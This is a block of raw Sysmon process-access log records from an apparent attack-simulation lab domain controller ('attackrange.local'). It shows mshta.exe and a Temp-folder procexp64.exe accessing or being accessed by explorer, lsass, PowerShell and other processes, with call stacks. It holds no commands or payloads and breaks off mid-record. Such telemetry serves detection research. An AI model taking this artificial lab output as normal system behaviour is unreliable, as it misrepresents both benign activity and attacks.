15:16:36.908{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789853Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.908{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789852Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.908{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789851Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.908{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789850Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.908{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789849Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.892{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789848Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.892{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789847Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.892{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789846Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.892{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789845Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.892{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789844Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.892{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789843Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.892{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789842Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.876{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789841Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.876{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789840Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-151A-600B-1600-00000000A301}15281680C:\Windows\system32\svchost.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789839Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789838Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789837Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789836Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789835Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789834Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789833Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789832Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789831Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789830Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789829Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789828Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789827Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789826Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dl